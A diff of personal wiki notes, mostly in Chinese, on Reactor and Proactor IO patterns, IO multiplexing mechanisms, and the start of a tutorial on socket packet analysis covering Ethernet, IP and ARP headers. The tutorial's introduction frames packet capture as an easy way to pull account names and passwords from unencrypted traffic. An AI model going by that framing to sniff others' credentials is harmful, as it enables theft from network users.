||||
// notify all the handlers.
|
||||
std::for_each( _handlers.begin(), _handlers.end(), onRead );
|
||||
}
|
||||
|
||||
private:
|
||||
HandlerList *_handlers;
|
||||
};
|
||||
|
||||
class Handler
|
||||
{
|
||||
public:
|
||||
virtual void onRead() = 0;
|
||||
};
|
||||
|
||||
// application level handler.
|
||||
class MyHandler : public Handler
|
||||
{
|
||||
public:
|
||||
void onRead()
|
||||
{
|
||||
//
|
||||
}
|
||||
};
|
||||
|
||||
|
||||
Reactor通过某种变形,可以将其改装为Proactor,在某些不支持异步IO的系统上,也可以隐藏底层的实现,利于编写跨平台
|
||||
代码。我们只需要在dispatch(也就是demultiplexor)中封装同步IO操作的代码,在上层,用户提交自己的缓冲区到这一层,
|
||||
这一层检查到设备可操作时,不像原来立即回调handler,而是开始IO操作,然后将操作结果放到用户缓冲区(读),然后再
|
||||
回调handler。这样,对于上层handler而言,就像是proactor一样。详细技法参见这篇文章。
|
||||
|
||||
|
||||
最近在看spserver的代码,看到别人提各种并发系统中的模式,有点眼红,于是才来扫扫盲。知道什么是leader follower模式,
|
||||
reactor, proactor,multiplexing,对于心中的那个网络库也越来越清晰。
|
||||
|
||||
最近还干了些离谱的事,写了传说中的字节流编码,用模板的方式实现,不但保持了扩展性,还少写很多代码;处于效率考虑,
|
||||
写了个static array容器(其实就是template <typename _Tp, std::size_t size> class static_array { _Tp _con[size]),
|
||||
加了iterator,遵循STL标准,可以结合进STL的各个generic algorithm用,自我感觉不错。基础模块搭建完毕,解析了公司
|
||||
服务器网络模块的消息,我是不是真的打算用自己的网络模块重写我的验证服务器?在另一个给公司写的工具里,因为实在厌恶
|
||||
越来越多的重复代码,索性写了几个宏,还真的做到了代码的自动生成:D。
|
||||
|
||||
对优雅代码的追求真的成了种癖好. = =|
|
||||
@@ -0,0 +1,250 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-27T21:44:44+08:00
|
||||
|
||||
====== Comparing Two High-Performance IO Design Patterns ======
|
||||
Created Monday 27 February 2012
|
||||
|
||||
http://www.artima.com/articles/io_design_patterns.html
|
||||
|
||||
by Alexander Libman with Vladimir Gilbourd November 25, 2005
|
||||
|
||||
===== Summary =====
|
||||
This article investigates and compares different __design patterns__ of high performance __TCP-based__ servers. In addition to existing approaches, it proposes a scalable single-codebase, multi-platform solution (with code examples) and describes its fine-tuning on different platforms. It also compares performance of Java, C# and C++ implementations of proposed and existing solutions.
|
||||
|
||||
**System I/O **can be __blocking__, or __non-blocking synchronous__, or __non-blocking asynchronous__ [1, 2]. Blocking I/O means that the calling system does **not return control to the caller **until the operation is finished. As a result, the caller is blocked and cannot perform other activities during that time. Most important, the caller thread__ cannot be reused for other request processing__ while waiting for the I/O to complete, and becomes __a wasted resource__ during that time. For example, a read() operation on a socket in blocking mode will not return control if the socket buffer is empty until** some data becomes available**.
|
||||
|
||||
By contrast, a** non-blocking synchronous **call returns control to the caller __immediately__. The caller is not made to wait, and the invoked system immediately returns one of two responses: If the call was executed and the results are ready, then the caller is told of that. Alternatively, the invoked system can tell the caller that the system has **no resources** (no data in the socket) to perform the requested action. In that case, it is the responsibility of the caller __may repeat the call until it succeeds.__ For example, a read() operation on a socket in non-blocking mode may return the number of read bytes or a special return code -1 with errno set to **EWOULBLOCK/EAGAIN**, meaning "not ready; try again later."
|
||||
|
||||
In a** non-blocking asynchronous **call, the calling function returns control to the caller immediately, reporting that __the requested action was started__. The calling system will execute the caller's request **using additional system resources/threads** and will notify the caller (by **callback **for example), when the result is ready for processing. For example, a Windows ReadFile() or **POSIX aio_read() API **returns immediately and initiates an internal system read operation. Of the three approaches, __this non-blocking asynchronous approach offers the best scalability and performance__.
|
||||
|
||||
This article investigates different non-blocking I/O multiplexing mechanisms and proposes a single multi-platform design pattern/solution. We hope that this article will help developers of **high performance TCP based servers** to choose optimal design solution. We also compare the performance of Java, C# and C++ implementations of proposed and existing solutions. We will exclude the blocking approach from further discussion and comparison at all, as it the least effective approach for scalability and performance.
|
||||
|
||||
===== Reactor and Proactor: two I/O multiplexing approaches =====
|
||||
|
||||
In general, __I/O multiplexing mechanisms rely on an event demultiplexor __[1, 3], an object that **dispatches I/O events** from a limited number of sources to the appropriate read/write event handlers. The developer __registers__ interest in** specific events **and provides__ event handlers, or callbacks__. The event demultiplexor delivers the requested events to the event handlers.
|
||||
|
||||
Two patterns that involve event demultiplexors are called__ Reactor and Proactor __[1]. The Reactor patterns involve__ synchronous I/O__, whereas the Proactor pattern involves __asynchronous I/O__. In Reactor, the event demultiplexor waits for events that indicate when a file descriptor or socket **is ready for a read or write** operation. The demultiplexor passes this event to the appropriate handler, which is responsible for performing the **actual read or write.**
|
||||
**这时的write还可能阻塞,但是使用Reactor的一般是NonBlock I/O。**
|
||||
|
||||
In the Proactor pattern, by contrast, the handler—or the event demultiplexor on behalf of the handler—**initiates asynchronous** read and write operations. The I/O operation itself is__ performed by the operating system (OS)__. The parameters passed to the OS include t**he addresses of user-defined data buffers** from which the OS gets data to write, or to which the OS puts data read. The event demultiplexor __waits for events that indicate the completion of the I/O operation__, and forwards those events to the appropriate handlers. For example, on Windows a handler could initiate **async I/O **(overlapped in Microsoft terminology) operations, and the event demultiplexor could wait for IOCompletion events [1]. The implementation of this classic asynchronous pattern is based on an asynchronous __OS-level __API, and we will call this implementation the__ "system-level" or "true" async__, because the application fully relies on the OS to execute actual I/O.
|
||||
|
||||
===== An example =====
|
||||
will help you understand the difference between Reactor and Proactor. We will focus on the **read** operation here, as the write implementation is similar. Here's a read in Reactor:
|
||||
|
||||
* An event handler declares interest in I/O events that indicate **readiness for read **on a particular socket
|
||||
* The event demultiplexor waits for events
|
||||
* An event comes in and wakes-up the demultiplexor, and the demultiplexor **calls the appropriate handler**
|
||||
* The event handler __performs the actual read operatio__n, handles the data read, **declares renewed interest **in I/O events, and** returns control to the dispatcher**
|
||||
|
||||
By comparison, here is a read operation in Proactor (true async):
|
||||
|
||||
* A handler initiates an asynchronous read operation (note: the __OS must support__ asynchronous I/O). In this case, the handler does not care about I/O readiness events, but is instead registers interest in__ receiving completion events__.
|
||||
* The event demultiplexor waits until the operation is **completed**
|
||||
* While the event demultiplexor waits, the __OS __executes the read operation in a parallel kernel thread, puts data into a **user-defined buffer,** and notifies the event demultiplexor that the read is complete
|
||||
* The event demultiplexor calls the appropriate handler;
|
||||
* The event handler **handles the data from user defined buffer**, starts a new asynchronous operation, and returns control to the event demultiplexor.
|
||||
|
||||
===== Current practice =====
|
||||
|
||||
The open-source C++ development framework __ACE__ [1, 3] developed by Douglas Schmidt, et al., offers a wide range of platform-independent, low-level concurrency support classes (threading, mutexes, etc). On the top level it provides two separate groups of classes: implementations of the__ ACE Reactor __and __ACE Proactor__. Although both of them are based on platform-independent primitives, these tools offer different interfaces.
|
||||
|
||||
The __ACE Proactor__ gives much better performance and robustness on MS-Windows, as Windows provides a very efficient **async API,** based on operating-system-level support [4, 5].
|
||||
|
||||
Unfortunately, not all operating systems provide full robust __async OS-level__ support. For instance, many Unix systems do not. Therefore, __ACE Reactor__ is a preferable solution in UNIX (currently UNIX does not have robust async facilities for sockets). As a result, to achieve the best performance on each system, developers of networked applications need to **maintain two separate code-bases**: an ACE Proactor based solution on Windows and an ACE Reactor based solution for Unix-based systems.
|
||||
|
||||
As we mentioned, the **true async Proactor **pattern requires operating-system-level support. Due to the differing nature of event handler and operating-system interaction, it is difficult to create common,** unified external interfaces** for both Reactor and Proactor patterns. That, in turn, makes it hard to create a fully portable development framework and encapsulate the interface and OS- related differences.
|
||||
|
||||
===== Proposed solution =====
|
||||
|
||||
In this section, we will propose a solution to the challenge of __designing a portable framework for the Proactor and Reactor I/O patterns__. To demonstrate this solution, we will __transform a Reactor demultiplexor I/O solution to an emulated async I/O__ by moving read/write operations from event handlers inside the demultiplexor (this is "emulated async" approach). The following example illustrates that conversion for a read operation:
|
||||
|
||||
* An event handler declares interest in** I/O events** (readiness for read) and provides the demultiplexor with information such as the **address of a data buffer**, or the **number **of bytes to read.
|
||||
* Dispatcher waits for events (for example, on select());
|
||||
* When an event arrives, it awakes up the dispatcher. The dispatcher performs **a non- blocking read operation** (it has all necessary information to perform this operation) and on __completion__ calls the appropriate handler.
|
||||
* The event handler handles data from the user-defined buffer, __declares new interest,__ along with information about where to put the data buffer and the number bytes to read in I/O events. The event handler then returns control to the dispatcher.
|
||||
|
||||
As we can see, by **adding functionality** to the demultiplexor I/O pattern, we were able to__ convert the Reactor pattern to a Proactor pattern__. In terms of the amount of work performed, this approach is exactly the same as the Reactor pattern. We simply** shifted responsibilities between different actors.** There is no performance degradation because the amount of work performed is still the same. The work was simply performed __by different actors. __The following lists of steps demonstrate that each approach performs an equal amount of work:
|
||||
|
||||
==== Standard/classic Reactor: ====
|
||||
|
||||
Step 1) wait for event (**Reactor** job)
|
||||
Step 2) dispatch "Ready-to-Read" event to user handler ( Reactor job)
|
||||
Step 3) **read data** (**user handler** job)
|
||||
Step 4) process data ( user handler job)
|
||||
|
||||
==== Proposed emulated Proactor: ====
|
||||
|
||||
Step 1) wait for event (Proactor job)
|
||||
Step 2) read data (now __Proactor job__)
|
||||
Step 3) dispatch "Read-Completed" event to user handler (Proactor job)
|
||||
Step 4) process data (**user handler** job)
|
||||
|
||||
With an operating system that does not provide an async I/O API, this approach allows us to hide the reactive nature of available socket APIs and to__ expose a fully proactive async interface__. This allows us to create a fully portable platform-independent solution with a common external interface.
|
||||
|
||||
===== TProactor =====
|
||||
|
||||
The proposed solution (TProactor) was developed and implemented at Terabit P/L [6]. The solution has two alternative implementations, one in C++ and one in Java. The C++ version was built** using ACE cross-platform low-level primitives** and has__ a common unified async proactive interface on all platforms__.
|
||||
|
||||
The main TProactor components are the __Engine __**and **__WaitStrategy__** interfaces**. Engine manages the async operations lifecycle. WaitStrategy manages concurrency strategies. WaitStrategy depends on Engine and the two always work in pairs. Interfaces between Engine and WaitStrategy are **strongly defined**.
|
||||
|
||||
Engines and waiting strategies are implemented as p__luggable class-drivers__ (for the full list of all implemented Engines and corresponding WaitStrategies, see Appendix 1). TProactor is a** highly configurable **solution. It internally implements three engines (P__OSIX AIO__, SUN AIO and Emulated AIO) and hides six different waiting strategies, based on an** asynchronous kernel API **(for POSIX- this is not efficient right now due to internal POSIX AIO API problems) and **synchronous** Unix select(), poll(), /dev/poll (Solaris 5.8+), port_get (Solaris 5.10), __RealTime __(RT) signals (Linux 2.4+), __epoll __(Linux 2.6), __k-queue__ (FreeBSD) APIs. TProactor conforms to the standard ACE Proactor implementation interface. That makes it possible to develop a single cross-platform solution (POSIX/MS-WINDOWS) with a common (ACE Proactor) interface.
|
||||
|
||||
With a set of mutually interchangeable "lego-style" Engines and WaitStrategies, a developer can choose the appropriate internal mechanism (engine and waiting strategy) at run time by** setting appropriate configuration parameters. **These settings may be specified according to specific requirements, such as the number of connections, scalability, and the targeted OS. If the operating system supports async API, a developer may use the true async approach, otherwise the user can opt for an emulated async solutions built on different sync waiting strategies. All of those strategies are hidden behind an emulated async façade.
|
||||
|
||||
For an HTTP server running on Sun Solaris, for example, the /dev/poll or port_get()-based engines is the most suitable choice, able to serve huge number of connections, but for another UNIX solution with a limited number of connections but high throughput requirements, a select()-based engine may be a better approach. Such flexibility cannot be achieved with a standard ACE Reactor/Proactor, due to inherent algorithmic problems of different wait strategies (see Appendix 2).
|
||||
|
||||
In terms of performance, our tests show that emulating from reactive to proactive does not impose any overhead—it can be faster, but not slower. According to our test results, the TProactor gives on average of up to 10-35 % better performance (measured in terms of both throughput and response times) than the reactive model in the standard ACE Reactor implementation on various UNIX/Linux platforms. On Windows it gives the same performance as standard ACE Proactor.
|
||||
|
||||
===== Performance comparison (JAVA versus C++ versus C#). =====
|
||||
|
||||
In addition to C++, as we also implemented TProactor in Java. As for JDK version 1.4, Java provides only the sync-based approach that is logically similar to C select() [7, 8]. Java TProactor is based on Java's non-blocking facilities (java.nio packages) logically similar to C++ TProactor with waiting strategy based on select().
|
||||
|
||||
Figures 1 and 2 chart the transfer rate in bits/sec versus the number of connections. These charts represent comparison results for a simple echo-server built on standard ACE Reactor, using RedHat Linux 9.0, TProactor C++ and Java (IBM 1.4JVM) on Microsoft's Windows and RedHat Linux9.0, and a C# echo-server running on the Windows operating system. Performance of native AIO APIs is represented by "Async"-marked curves; by emulated AIO (TProactor)—AsyncE curves; and by TP_Reactor—Synch curves. All implementations were bombarded by the same client application—a continuous stream of arbitrary fixed sized messages via N connections.
|
||||
|
||||
The full set of tests was performed on the same hardware. Tests on different machines proved that relative results are consistent.
|
||||
Figure 1. Windows XP/P4 2.6GHz HyperThreading/512 MB RAM.
|
||||
Figure 2. Linux RedHat 2.4.20-smp/P4 2.6GHz HyperThreading/512 MB RAM.
|
||||
|
||||
===== User code example =====
|
||||
|
||||
The following is the skeleton of a simple TProactor-based Java echo-server. In a nutshell, the developer only has to implement the two interfaces: OpRead with buffer where TProactor puts its read results, and OpWrite with a buffer from which TProactor takes data. The developer will also need to implement protocol-specific logic via providing callbacks onReadCompleted() and onWriteCompleted() in the AsynchHandler interface implementation. Those callbacks will be asynchronously called by TProactor on completion of read/write operations and executed on a thread pool space provided by TProactor (the developer doesn't need to write his own pool).
|
||||
|
||||
class EchoServerProtocol implements AsynchHandler
|
||||
{
|
||||
|
||||
AsynchChannel achannel = null;
|
||||
|
||||
EchoServerProtocol( Demultiplexor m, SelectableChannel channel ) throws Exception
|
||||
{
|
||||
this.achannel = new AsynchChannel( m, this, channel );
|
||||
}
|
||||
|
||||
public void start() throws Exception
|
||||
{
|
||||
// called after construction
|
||||
System.out.println( Thread.currentThread().getName() + ": EchoServer protocol started" );
|
||||
achannel.read( buffer);
|
||||
}
|
||||
|
||||
public void onReadCompleted( OpRead opRead ) throws Exception
|
||||
{
|
||||
if ( opRead.getError() != null )
|
||||
{
|
||||
// handle error, do clean-up if needed
|
||||
System.out.println( "EchoServer::readCompleted: " + opRead.getError().toString());
|
||||
achannel.close();
|
||||
return;
|
||||
}
|
||||
|
||||
if ( opRead.getBytesCompleted () <= 0)
|
||||
{
|
||||
System.out.println( "EchoServer::readCompleted: Peer closed " + opRead.getBytesCompleted();
|
||||
achannel.close();
|
||||
return;
|
||||
}
|
||||
|
||||
ByteBuffer buffer = opRead.getBuffer();
|
||||
|
||||
achannel.write(buffer);
|
||||
}
|
||||
|
||||
public void onWriteCompleted(OpWrite opWrite) throws Exception
|
||||
{
|
||||
// logically similar to onReadCompleted
|
||||
...
|
||||
}
|
||||
}
|
||||
|
||||
IOHandler is a TProactor base class. AsynchHandler and Multiplexor, among other things, internally execute the wait strategy chosen by the developer.
|
||||
|
||||
===== Conclusion =====
|
||||
|
||||
TProactor provides a common, flexible, and configurable solution for multi-platform high- performance communications development. All of the problems and complexities mentioned in Appendix 2, are hidden from the developer.
|
||||
|
||||
It is clear from the charts that C++ is still the preferable approach for high performance communication solutions, but Java on Linux comes quite close. However, the overall Java performance was weakened by poor results on Windows. One reason for that may be that the Java 1.4 nio package is based on select()-style API. <20> It is true, Java NIO package is kind of Reactor pattern based on select()-style API (see [7, 8]). Java NIO allows to write your own select()-style provider (equivalent of TProactor waiting strategies). Looking at Java NIO implementation for Windows (to do this enough to examine import symbols in jdk1.5.0\jre\bin\nio.dll), we can make a conclusion that Java NIO 1.4.2 and 1.5.0 for Windows is based on WSAEventSelect () API. That is better than select(), but slower than IOCompletionPort<72>s for significant number of connections. . Should the 1.5 version of Java's nio be based on IOCompletionPorts, then that should improve performance. If Java NIO would use IOCompletionPorts, than conversion of Proactor pattern to Reactor pattern should be made inside nio.dll. Although such conversion is more complicated than Reactor- >Proactor conversion, but it can be implemented in frames of Java NIO interfaces. (this the topic of next arcticle, but we can provide algorithm). At this time, no TProactor performance tests were done on JDK 1.5.
|
||||
|
||||
Note. All tests for Java are performed on "raw" buffers (java.nio.ByteBuffer) without data processing.
|
||||
|
||||
Taking into account the latest activities to develop robust AIO on Linux [9], we can conclude that Linux Kernel API (io_xxxx set of system calls) should be more scalable in comparison with POSIX standard, but still not portable. In this case, TProactor with new Engine/Wait Strategy pair, based on native LINUX AIO can be easily implemented to overcome portability issues and to cover Linux native AIO with standard ACE Proactor interface.
|
||||
|
||||
===== Appendix I =====
|
||||
|
||||
Engines and waiting strategies implemented in TProactor
|
||||
|
||||
Engine Type Wait Strategies Operating System
|
||||
POSIX_AIO (true async)
|
||||
aio_read()/aio_write() aio_suspend()
|
||||
Waiting for RT signal
|
||||
Callback function POSIX complained UNIX (not robust)
|
||||
POSIX (not robust)
|
||||
SGI IRIX, LINUX (not robust)
|
||||
SUN_AIO (true async)
|
||||
aio_read()/aio_write() aio_wait() SUN (not robust)
|
||||
Emulated Async
|
||||
Non-blocking read()/write() select()
|
||||
poll()
|
||||
/dev/poll
|
||||
Linux RT signals
|
||||
Kqueue generic POSIX
|
||||
Mostly all POSIX implementations
|
||||
SUN
|
||||
Linux
|
||||
FreeBSD
|
||||
Appendix II
|
||||
|
||||
All sync waiting strategies can be divided into two groups:
|
||||
|
||||
edge-triggered (e.g. Linux RT signals)—signal readiness only when socket became ready (changes state);
|
||||
level-triggered (e.g. select(), poll(), /dev/poll)—readiness at any time.
|
||||
|
||||
Let us describe some common logical problems for those groups:
|
||||
|
||||
edge-triggered group: after executing I/O operation, the demultiplexing loop can lose the state of socket readiness. Example: the "read" handler did not read whole chunk of data, so the socket remains still ready for read. But the demultiplexor loop will not receive next notification.
|
||||
level-triggered group: when demultiplexor loop detects readiness, it starts the write/read user defined handler. But before the start, it should remove socket descriptior from the set of monitored descriptors. Otherwise, the same event can be dispatched twice.
|
||||
Obviously, solving these problems adds extra complexities to development. All these problems were resolved internally within TProactor and the developer should not worry about those details, while in the synch approach one needs to apply extra effort to resolve them.
|
||||
|
||||
Resources
|
||||
|
||||
[1] Douglas C. Schmidt, Stephen D. Huston "C++ Network Programming." 2002, Addison-Wesley ISBN 0-201-60464-7
|
||||
|
||||
[2] W. Richard Stevens "UNIX Network Programming" vol. 1 and 2, 1999, Prentice Hill, ISBN 0-13- 490012-X
|
||||
|
||||
[3] Douglas C. Schmidt, Michael Stal, Hans Rohnert, Frank Buschmann "Pattern-Oriented Software Architecture: Patterns for Concurrent and Networked Objects, Volume 2" Wiley & Sons, NY 2000
|
||||
|
||||
[4] INFO: Socket Overlapped I/O Versus Blocking/Non-blocking Mode. Q181611. Microsoft Knowledge Base Articles.
|
||||
|
||||
[5] Microsoft MSDN. I/O Completion Ports.
|
||||
http://msdn.microsoft.com/library/default.asp?url=/library/en- us/fileio/fs/i_o_completion_ports.asp
|
||||
|
||||
[6] TProactor (ACE compatible Proactor).
|
||||
www.terabit.com.au
|
||||
|
||||
[7] JavaDoc java.nio.channels
|
||||
http://java.sun.com/j2se/1.4.2/docs/api/java/nio/channels/package-summary.html
|
||||
|
||||
[8] JavaDoc Java.nio.channels.spi Class SelectorProvider
|
||||
http://java.sun.com/j2se/1.4.2/docs/api/java/nio/channels/spi/SelectorProvider.html
|
||||
|
||||
[9] Linux AIO development
|
||||
http://lse.sourceforge.net/io/aio.html, and
|
||||
http://archive.linuxsymposium.org/ols2003/Proceedings/All-Reprints/Reprint-Pulavarty-OLS2003.pdf
|
||||
|
||||
See Also:
|
||||
|
||||
Ian Barile "I/O Multiplexing & Scalable Socket Servers", 2004 February, DDJ
|
||||
|
||||
Further reading on event handling
|
||||
- http://www.cs.wustl.edu/~schmidt/ACE-papers.html
|
||||
|
||||
The Adaptive Communication Environment
|
||||
http://www.cs.wustl.edu/~schmidt/ACE.html
|
||||
|
||||
Terabit Solutions
|
||||
http://terabit.com.au/solutions.php
|
||||
About the authors
|
||||
|
||||
Alex Libman has been programming for 15 years. During the past 5 years his main area of interest is pattern-oriented multiplatform networked programming using C++ and Java. He is big fan and contributor of ACE.
|
||||
|
||||
Vlad Gilbourd works as a computer consultant, but wishes to spend more time listening jazz :) As a hobby, he started and runs www.corporatenews.com.au website.
|
||||
|
||||
BIN
Zim/Programme/APUE/Proactor和Reactor模式/proactor_uml_thumb.jpg
Normal file
|
After Width: | Height: | Size: 51 KiB |
@@ -0,0 +1,78 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-27T21:10:43+08:00
|
||||
|
||||
====== 再谈select, iocp, epoll,kqueue及各种IO复用机制 ======
|
||||
Created Monday 27 February 2012
|
||||
|
||||
http://blog.csdn.net/shallwake/article/details/5265287
|
||||
|
||||
我也是菜鸟,学习本身就是一个不断追求真理的过程,希望能谅解:)
|
||||
|
||||
首先,介绍几种常见的I/O模型及其区别,如下:
|
||||
|
||||
* blocking I/O
|
||||
* nonblocking I/O
|
||||
* I/O multiplexing (select and poll)
|
||||
* __signal driven I/O__ (SIGIO)
|
||||
* __asynchronous I/O__ (the POSIX aio_functions)
|
||||
|
||||
===== blocking I/O =====
|
||||
这个不用多解释吧,阻塞套接字。下图是它调用过程的图示:
|
||||
{{./1.jpg}}
|
||||
重点解释下上图,下面例子都会讲到。首先application调用 recvfrom()转入kernel,注意kernel有2个过程,wait for data和copy data from kernel to user。直到最后copy complete后,recvfrom()才返回。此过程Application一直是阻塞的。
|
||||
|
||||
===== nonblocking I/O: =====
|
||||
与blocking I/O对立的,非阻塞套接字,调用过程图如下:
|
||||
{{./2.jpg}}
|
||||
可以看见,__如果直接操作它,那就是个轮询__, 直到内核缓冲区有数据。
|
||||
|
||||
===== I/O multiplexing (select and poll) =====
|
||||
最常见的I/O复用模型,select。
|
||||
{{./3.jpg}}
|
||||
select先阻塞,__有活动套接字才返回__。与blocking I/O相比,select会有两次系统调用,但是select能处理__多个套接字__。
|
||||
|
||||
===== signal driven I/O (SIGIO) =====
|
||||
只有UNIX系统支持,感兴趣的课查阅相关资料
|
||||
{{./4.jpg}}
|
||||
与I/O multiplexing (select and poll)相比,它的优势是,__免去了select的阻塞与轮询__,当有活跃套接字时,由注册的handler处理。
|
||||
|
||||
===== asynchronous I/O (the POSIX aio_functions) =====
|
||||
很少有*nix系统支持,__windows__的IOCP则是此模型
|
||||
{{./5.jpg}}
|
||||
__完全异步的I/O复用机制__,因为纵观上面其它四种模型,至少都会在由kernel copy data to appliction时阻塞。而该模型是__当copy完成后才通知application__,可见是纯异步的。好像只有windows的完成端口是这个模型,效率也很出色。
|
||||
|
||||
===== 下面是以上五种模型的比较 =====
|
||||
{{./6.jpg}}
|
||||
可以看出,越往后,阻塞越少,理论上效率也是最优。
|
||||
|
||||
=====================分割线==================================
|
||||
|
||||
5种模型的比较比较清晰了,剩下的就是把select,epoll,iocp,kqueue按号入座那就OK了。
|
||||
|
||||
select和iocp分别对应第3种与第5种模型,那么epoll与kqueue呢?其实也__与select属于同一种模型,只是更高级一些__,可以看作有了第4种模型的某些特性,如__callback机制__。
|
||||
|
||||
==== 那么,为什么epoll,kqueue比select高级? ====
|
||||
|
||||
答案是,__他们无轮询,因为他们用callback取代了__。想想看,当套接字比较多的时候,每次select()都要通过__遍历__FD_SETSIZE个Socket来完成调度,不管哪个Socket是活跃的,都遍历一遍。这会浪费很多CPU时间。如果能**给套接字注册某个回调函数,当他们活跃时,自动完成相关操作,那就避免了轮询**,这正是epoll与kqueue做的。
|
||||
|
||||
==== windows or *nix (IOCP or kqueue/epoll)? ====
|
||||
|
||||
诚然,Windows的IOCP非常出色,目前很少有支持asynchronous I/O的系统,但是由于其系统本身的局限性,大型服务器还是在UNIX下。而且正如上面所述,kqueue/epoll 与 IOCP相比,就是__多了一层从内核copy数据到应用层的阻塞__,从而不能算作asynchronous I/O类。但是,这层小小的阻塞无足轻重,kqueue与epoll已经做得很优秀了。
|
||||
|
||||
==== 提供一致的接口,IO Design Patterns ====
|
||||
|
||||
实际上,不管是哪种模型,都可以**抽象一层出来,提供一致的接口**,广为人知的有ACE,__Libevent__这些,他们都是跨平台的,而且他们**自动选择最优的I/O复用机制**,用户只需调用接口即可。说到这里又得说说2个设计模式,__Reactor and Proactor__。有一篇经典文章http://www.artima.com/articles/io_design_patterns.html值得阅读,Libevent是Reactor模型,ACE提供Proactor模型。实际都是对各种I/O复用机制的封装。
|
||||
|
||||
===== Java nio包是什么I/O机制? =====
|
||||
|
||||
我曾天真的认为java nio封装的是IOCP。。现在可以确定,目前的__java本质是select()模型__,可以检查/jre/bin/nio.dll得知。至于java服务器为什么效率还不错。。我也不得而知,可能是设计得比较好吧。。-_-。
|
||||
|
||||
=====================分割线==================================
|
||||
|
||||
===== 总结一些重点: =====
|
||||
|
||||
* 只有IOCP是asynchronous I/O,其他机制或多或少都会有一点阻塞。
|
||||
* select低效是因为每次它都需要轮询。但低效也是相对的,视情况而定,也可通过良好的设计改善
|
||||
* epoll, kqueue是Reacor模式,IOCP是Proactor模式。
|
||||
* java nio包是select模型。。
|
||||
|
After Width: | Height: | Size: 12 KiB |
|
After Width: | Height: | Size: 20 KiB |
|
After Width: | Height: | Size: 17 KiB |
|
After Width: | Height: | Size: 18 KiB |
|
After Width: | Height: | Size: 14 KiB |
|
After Width: | Height: | Size: 22 KiB |
351
Zim/Programme/APUE/Socket数据包分析.txt
Normal file
@@ -0,0 +1,351 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T14:37:59+08:00
|
||||
|
||||
====== Socket数据包分析 ======
|
||||
Created 星期六 04 六月 2011
|
||||
http://www.cublog.cn/u2/78978/showart_2082876.html
|
||||
Socket数据包分析
|
||||
通过对数据包的分析,我们可以判断通信双方的操作系统、网络信息流量、经过的路由、数据包的大小,以及数据包的内容等等。对于喜欢网络安全的人来说,掌握这方面的知识是相当重要的。现在的网络通信中,大部分数据都没有加密,我们可以轻易地从数据包中提取账号、密码之类我们关心的数据.大家在看本文时如有困难,可先读一读计算机网络及C程序设计还有协议分析方面的书。下面我将分TCP/IP族协议结构、程序部分函数及数据结构说明、案例程序剖析三个部分与大家共同学习数据包分析程序的设计方法。
|
||||
|
||||
一、TCP/IP族协议结构
|
||||
在说TCP/IP之前,先让我们来认识一下以太网,因为我们现在接触最多的就是以太网,并且研究数据包又是离不开以太网的帧的。在以太网中,数据是以被称为帧的数据结构本为单位进行交换的。以太网中常用的协议是 CSMA/CD(carrier sense multiple access with collision detection)即载波监听多点接入/碰撞检测,在这里,我们关注的是帧的格式。常用的以太网帧的格式有两种标准,一种是DIX Ethernet V2标准,另一种是IEEE的802.3标准。现在最常用的MAC帧是V2格式,这也是我们所要研究的格式,至于802.3帧我们不再讨论。以太网V2帧的格式如下:
|
||||
(插入8字节)目的地址(6字节)->源地址(6字节)->类型(2字节)->数据(46-1500)->FCS(4字节)
|
||||
以太网的地址由48位的二进制来表示,也就是我们常说的MAC地址及硬件地址。在MAC帧前还有8字节的前同步码和帧的开始定界符,之后才是地址等报头信息。接收端和发送端的地址之后是2字节的类型字段,存放帧中传送数据的上层协议类型,RFC1700号文档规定了这些,如下:
|
||||
ETHER TYPES(十六进制) PROTOCOlS
|
||||
800 IP
|
||||
806 ARP
|
||||
8035 Revese ARP
|
||||
809B Apple Talk
|
||||
8137/8138 Novel
|
||||
814c SNMP
|
||||
帧的数据部分长度为46-1500字节,当小于46时,会在后面加入一个整数字节的填充字段。FCS(Frame Check Sequence)在以太网常用循环冗佘校检(CRC:cyclic redandancy check)。
|
||||
IP协议为网络层协议,网络层的数据结构体被称为IP数据报。IP地址及域名这两个概念我们就不说了,下面我们来看一看IP数据报的结构:
|
||||
成员名 字节数 说明
|
||||
version 1/2 IP的版本,现在为IPV4
|
||||
IHL(报送长度) 1/2 最常用为20,取5-15之前的值,最大60字节
|
||||
Type Of Service 1 优先和可靠性服务要求的数值
|
||||
Total Lenth 2 IP数据报的全长
|
||||
Identification 2 识别IP数据报的编号
|
||||
Flags 3/8 1位为0表示有碎块,2位为0表示是最后的碎块,为1表示接收中。
|
||||
Fragment Offset 13/8 分片在原分组中的位置
|
||||
TTL 1 数据报寿命,建议值为32秒
|
||||
Protocol 1 上层协议
|
||||
Headerchecksum 2 报头检验码
|
||||
Source Address 4 发送端IP地址
|
||||
Destination Address 4 接收端IP地址
|
||||
Options And Padding 4 选项及填充位
|
||||
其中协议字段的值对我们分析数据包是很重要的,下面列出来给大家看看:
|
||||
值 协议 意义
|
||||
1 ICMP Internet Control Message Protocol
|
||||
6 TCP Tranfer Control Protocol
|
||||
8 EGP Exterior Gateway Protocol
|
||||
9 IGP Interior Gateway Protocol
|
||||
17 UDP User Datagram Protocol
|
||||
下面这些协议的值在后面的程序中我们可以见到,请大家留心记一下。接着我们介绍地址解析协议(ARP/RARP):
|
||||
成员名 字节数 说明
|
||||
Hardware address 2 硬件类型,以太网为1
|
||||
Protocol address 2 上层协议类型,IP为800
|
||||
Byte length of each hardware 1 查询物理地址的字节长度,以太网为6
|
||||
Byte length of each protocol address 1 查询上层协议的字节长度,IPv4时为4
|
||||
Opcode 2 1为ARP请求,2为响应;3为RARP请求,4为响应
|
||||
Hardware address of sender of this packet 6 发送端硬件地址
|
||||
protocol address of sender of this packet 4 发送端IP地址
|
||||
Hardware address of target of this packet 6 查询对象硬件地址
|
||||
Protocol address of target of this packet 4 查询对象IP地址
|
||||
ARP/RARP 协议用来查询IP对应的硬件地址或反过来查询IP地址,这在我们分析数据包时也会见到。下面介绍ICMP协议。我们常用的PING命令就是用的这个协议,这个协议比较简单,由类型(1字节)、代码(1字节)、检验和(2字节)、还有四个字节的与类型相关的可变部分及数据构成。
|
||||
数据包在运输层还有两个重要的协议,即TCP/UDP,TCP/UDP中使用端口的概念,以区别计算机上不同的程序。下面我们先来看看TCP数据报的首部构成:
|
||||
成员名 字节数 说明
|
||||
Source Port 2 发送端端口号
|
||||
